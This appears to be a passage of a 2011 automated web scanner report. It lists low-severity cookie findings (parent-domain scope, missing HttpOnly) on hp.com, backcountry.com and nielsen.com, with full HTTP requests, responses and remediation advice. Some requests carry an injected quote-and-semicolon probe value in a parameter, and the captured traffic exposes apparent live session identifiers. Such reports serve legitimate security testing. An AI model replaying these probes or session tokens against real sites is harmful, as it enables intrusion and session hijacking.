<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

3.19. http://www.shopping.hp.com/webapp/shopping/store_access.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/store_access.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e'%3b1cd62d1ca9e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; hpshopping=1&user_id=mlkqgtqf2Qt7MiHjv1bYeQeXlmvi; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e'%3B1cd62d1ca9e; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; lang=en-us; cc=us; prop12=r602; EMID=; s_depth=14; s_cc=true; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; HP_EBUS_HP_CLICKS=4x12x2345; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fdesktops%25253BHHOJSID%25253DHWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182%25253Fjumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_desktops_home4923e'%2525253b1cd62d1ca9e%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fstore_access.do_template_type%25253Dseries_detail%252526category%25253Ddesktops%252526series_name%25253Dp7xt_s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CFlash%252520%25253A%252520Main%252520%25253A%252520%252520Whats%252520hot%252520%25253A%252520Feature%2525201%252520%25253A%252520HP%252520Coolsense%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fus%25252Fen%25252Fpclc%25252Farticles%25252Fcoolsense-technology.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:00:03 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjg92V0Q14NS%2FivlvfcASe0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:00:03 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:00:03 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 241316


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 77 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://www.backcountry.com/mens-clothing  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /mens-clothing

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mens-clothing HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/store/user.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; __utmx=248652180.; __utmxx=248652180.; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; 9551721-VID=5110247826455; 9551721-SKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; shipping_selection=FREE; CART=mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; siec=false; affiliate_reference_id=R999; tr_template=; promo_nav=; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%2C%5B%27Direct%2520Load%27%2C%271316711656080%27%5D%5D; mr_referredVisitor=0; mr_domainUserTicketID=1039053c-e24c-b398-c4aa-7037768e3b34; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713456784; c49=Customer%20Login; s_sc_scOpen=1; s_sq=bcbackcountry%3D%2526pid%253DCustomer%252520Login%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/mens-clothing%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
Moovweb-Pagetype: CATEGORY
Moovweb-Pageversion: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 104410
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:13:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:13:34 GMT
Set-Cookie: siec=false; path=/; expires=Tue, 21-Sep-2021 22:13:33 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:13:33 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:13:34 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:13:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...

4.2. http://www.backcountry.com/store/BCS0021  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/BCS0021

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/BCS0021 HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mt.v=1.346469883.1316711542790; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; rdv_test_group=1; RES_TRACKINGID=841292264887481; siec=true; affiliate_reference_id=R999; __utmx=248652180.; __utmxx=248652180.; s_cc=true; mr_referredVisitor=0; s_sq=%5B%5BB%5D%5D; utag=session_id:1316711948944$_session:1316713377068; c49=PDP%3ABackcountry.com%20Gift%20Certificate; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; CART=

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
Location: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 0
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:39 GMT
Set-Cookie: RES_SESSIONID=256475435893179; path=/; domain=backcountry.com; expires=Thu, 22-Sep-2011 12:41:39 GMT
Set-Cookie: siec=true; path=/; expires=Tue, 21-Sep-2021 22:11:39 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:11:39 GMT


4.3. http://www.backcountry.com/store/PRA0870/Bliss-Capri-Pant-Womens.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/PRA0870/Bliss-Capri-Pant-Womens.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/PRA0870/Bliss-Capri-Pant-Womens.html HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/womens-capri-pants
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mr_referredVisitor=0; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713343437; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; c49=Home; s_sq=bcbackcountry%3D%2526pid%253DHome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/womens-clothing%2526ot%253DA; rdv_test_group=1; __utmx=248652180.; __utmxx=248652180.

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
X-Session-New: 1
X-Session-Init: 1
X-Session-Path: No session id
X-Session-Checked: 1
Location: http://www.backcountry.com/prana-bliss-capri-pant-womens
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 0
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:22 GMT
Set-Cookie: RES_TRACKINGID=841292264887481; path=/; domain=backcountry.com; expires=Tue, 21-Sep-2021 22:11:21 GMT
Set-Cookie: RES_SESSIONID=253168360320593; path=/; domain=backcountry.com; expires=Thu, 22-Sep-2011 12:41:21 GMT
Set-Cookie: siec=true; path=/; expires=Tue, 21-Sep-2021 22:11:22 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:11:22 GMT


4.4. http://www.backcountry.com/store/cart/add.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/cart/add.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/cart/add.html?item_code=BCS0021&mv_order_group=1&mv_todo=refresh&mv_form_profile=option_check&mv_session_id=&mv_order_cat_id=&mv_order_subcat_id=&mv_order_pg_id=&mv_order_catalog_id=&mv_order_is_gift_box=0&is_package=0&is_giftcert=1&mv_javascript=1&mv_sku=&sku_options=1&mv_order_swatch_position=&mv_order_quantity=1&x=61&y=13 HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/backcountry-gift-certificate-bcs0021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mt.v=1.346469883.1316711542790; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; rdv_test_group=1; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; RES_TRACKINGID=841292264887481; siec=true; affiliate_reference_id=R999; __utmx=248652180.; __utmxx=248652180.; s_cc=true; mr_referredVisitor=0; s_sq=%5B%5BB%5D%5D; utag=session_id:1316711948944$_session:1316713377068; c49=PDP%3ABackcountry.com%20Gift%20Certificate

Response

HTTP/1.1 303 See Other
Server: Apache
Location: /store/BCS0021
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: badlands
Content-Length: 258
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:39 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:39 GMT
Set-Cookie: CART=; path=/; expires=Sun, 19-Sep-2021 12:11:39 GMT

Bouncing to <a href="/store/BCS0021">/store/BCS0021</a><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www
...[SNIP]...

4.5. http://www.backcountry.com/store/cart/ajax/check_cart_reload_needed.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/cart/ajax/check_cart_reload_needed.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /store/cart/ajax/check_cart_reload_needed.html HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
Content-Length: 10
Origin: http://www.backcountry.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://www.backcountry.com/store/cart/add.html?item_code=BCS0021&mv_order_group=1&mv_todo=refresh&mv_form_profile=option_check&mv_session_id=&mv_order_cat_id=&mv_order_subcat_id=&mv_order_pg_id=&mv_order_catalog_id=&mv_order_is_gift_box=0&is_package=0&is_giftcert=1&mv_javascript=1&mv_sku=BCS0021-BCSGC125-ONSI&sku_options=1&mv_order_swatch_position=&mv_order_quantity=1&x=55&y=10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; __utmx=248652180.; __utmxx=248652180.; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; CART=; siec=true; affiliate_reference_id=R999; tr_template=; promo_nav=; s_cc=true; c49=Gift%20Certificate; s_sq=%5B%5BB%5D%5D; mr_referredVisitor=0; mr_domainUserTicketID=1039053c-e24c-b398-c4aa-7037768e3b34; utag=session_id:1316711948944$_session:1316713392233; mt.v=1.346469883.1316711542790

param=1661

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 7
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:11:55 GMT
Set-Cookie: CART=; path=/; expires=Sun, 19-Sep-2021 12:11:55 GMT
Set-Cookie: siec=true; path=/; expires=Tue, 21-Sep-2021 22:11:55 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:11:55 GMT

false


4.6. http://www.backcountry.com/store/user.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /store/user.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/user.html HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; __utmx=248652180.; __utmxx=248652180.; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; mr_referredVisitor=0; mr_domainUserTicketID=1039053c-e24c-b398-c4aa-7037768e3b34; mt.v=1.346469883.1316711542790; 9551721-VID=5110247826455; 9551721-SKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; tr_template=; promo_nav=; s_cc=true; utag=session_id:1316711948944$_session:1316713441727; shipping_selection=FREE; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; CART=mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23; siec=false; affiliate_reference_id=R999; c49=Step%202%20Place%20Your%20Order%20Error; s_sc_scOpen=1; s_sq=bcbackcountry%3D%2526pid%253DStep%2525202%252520Place%252520Your%252520Order%252520Error%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/store/user.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: arches
Content-Length: 33985
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:13:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT
Set-Cookie: siec=false; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:13:26 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...

4.7. http://nielsen.com/bin/statistics/tracker/query  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /bin/statistics/tracker/query

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bin/statistics/tracker/query?q=mobile+tv+internet*&nr=4&et=47&1316693830431 HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/content/corporate/us/en/search.html?q=mobile+tv+internet
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.4.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 404 Not Found
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 226

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /bin/statistics/tracker/query was not found on this s
...[SNIP]...

4.8. http://nielsen.com/bin/statistics/tracker/result  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /bin/statistics/tracker/result

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bin/statistics/tracker/result?p=%2Fus%2Fen%2Finsights%2Fpress-room%2F2008%2Fnielsen_reports_tv&po=1&q=mobile+tv+internet*&0.2873271522112191 HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
